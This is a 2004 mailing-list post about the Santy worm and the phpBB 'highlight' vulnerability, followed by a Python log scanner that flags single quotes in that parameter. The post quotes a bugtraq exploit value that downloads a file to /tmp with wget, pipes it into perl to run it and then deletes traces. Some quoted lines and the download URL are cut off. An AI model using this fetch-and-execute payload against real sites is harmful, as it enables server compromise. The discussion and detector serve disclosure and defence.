From: zx at (Paul Laudanski)
Subject: RE: Worm hitting PHPbb2 Forums

On Thu, 23 Dec 2004, Patrick Nolan wrote:

> A bot is not uploaded, not sure where that came from.
> And by now, it is not expected to be spreading at all, thanks to the
> interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 

"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."

Compare that to an exploit that is posted @bugtraq:


rush=echo _START_; cd /tmp;wget -O .b; perl -pe 
.b| perl; rm -f .b *.pl b0t*; echo _END_

It is making use of the highlight exploit in pre phpbb 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

Now that is catching the single quote in the highlight argument.


Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) -
Promoting education and health in online security and privacy.
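
A log-side version of the check mentioned in the message above (catching a single quote in the highlight argument of viewtopic.php), as an added example that is not part of the original post. The log lines, addresses and PLACEHOLDER values are constructed, and decoding the value repeatedly to expose nested percent-encoding is an assumption that goes beyond what the post states.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Dec/2004:10:00:01 +0000] "GET /viewtopic.php?t=42&highlight=firewall HTTP/1.0" 200 5120',
    '192.0.2.11 - - [23/Dec/2004:10:00:02 +0000] "GET /viewtopic.php?t=42&highlight=%27PLACEHOLDER HTTP/1.0" 200 5120',
    '192.0.2.12 - - [23/Dec/2004:10:00:03 +0000] "GET /viewtopic.php?t=42&highlight=%2527PLACEHOLDER&rush=PLACEHOLDER HTTP/1.0" 200 5120',
    '192.0.2.13 - - [23/Dec/2004:10:00:04 +0000] "GET /index.php?q=%27 HTTP/1.0" 200 900',
    '192.0.2.14 - - [23/Dec/2004:10:00:05 +0000] "GET /viewtopic.php?t=7&highlight=rock+%26+roll HTTP/1.0" 200 5120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings (%2527 -> %27 -> ') are exposed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_highlight(line):
    """Return the decoded highlight value if it contains a single quote, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("viewtopic.php"):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "highlight":
            decoded = fully_decode(value)
            if "'" in decoded:
                return decoded
    return None

def scan(lines):
    """Return (client_ip, decoded_highlight) for every flagged line."""
    return [(line.split()[0], value) for line in lines
            if (value := suspicious_highlight(line)) is not None]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: highlight contains a single quote after decoding: {value!r}")
```

A hit means the request should be reviewed, and a forum older than phpBB 2.0.11 that received one should be treated as possibly compromised until checked.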
